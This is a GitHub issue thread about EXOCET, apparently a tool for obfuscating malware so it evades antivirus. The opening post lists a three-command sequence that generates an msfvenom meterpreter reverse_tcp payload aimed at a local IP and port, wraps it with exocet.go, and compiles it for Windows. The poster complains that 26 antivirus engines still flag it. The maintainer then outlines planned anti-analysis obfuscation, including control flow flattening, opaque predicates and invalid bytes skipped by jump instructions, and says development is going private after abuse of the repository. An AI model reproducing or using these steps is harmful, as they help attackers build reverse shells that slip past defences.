Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Its detectable by 26 AVs #8

Open
Netskeepy opened this issue Feb 20, 2022 · 5 comments
Open

Its detectable by 26 AVs #8

Netskeepy opened this issue Feb 20, 2022 · 5 comments

Comments

@Netskeepy
Copy link

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=443 -f exe > shell.exe
  2. go run exocet.go ../shell.exe outputmalware.go pass123
  3. env GOOS=windows GOARCH=amd64 go build outputmalware.go

VIRUSTOTAL: 26 Eng
image

@stuxnet8t8
Copy link

Don't upload to virustotal ffs

@tanc7
Copy link
Owner

tanc7 commented Sep 6, 2022

Oh sorry, I misread it @Okta16 . Replying from gmail lol. Anyways, further EXOCET development is going to be private release only and will have features I will pick up from the MCSI MCD Certification which will allow me to use Control Flow Flattening looping into Opaque Predicates, looping back into several Dominant Functions, while C executing inline assembly will be implementing rogue bytes (invalid bytes starting with 0xfg) with interweaved jump instructions

  1. First short JMP 40 with those 40 bytes jumping over containing invalid bytes to mangle static analysis
  2. Second JMP -25 bytes that land in a embedded JMP instruction that jumps forward 127 bytes
  3. So the real entry point is 127-40.

That's a simple way to put it. The MCSI MCD is probably the most comprehensive course I found in deobfuscating and obfuscating malware. https://www.mosse-institute.com/certifications/mcd-certified-code-deobfuscation-specialist.html

From now on, EXOCET development is locked due to d-bags abusing the repo and drawing CRIMINAL liability to me. All future releases will be private release only

@tanc7
Copy link
Owner

tanc7 commented Sep 6, 2022 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants
@tanc7 @Netskeepy @stuxnet8t8 and others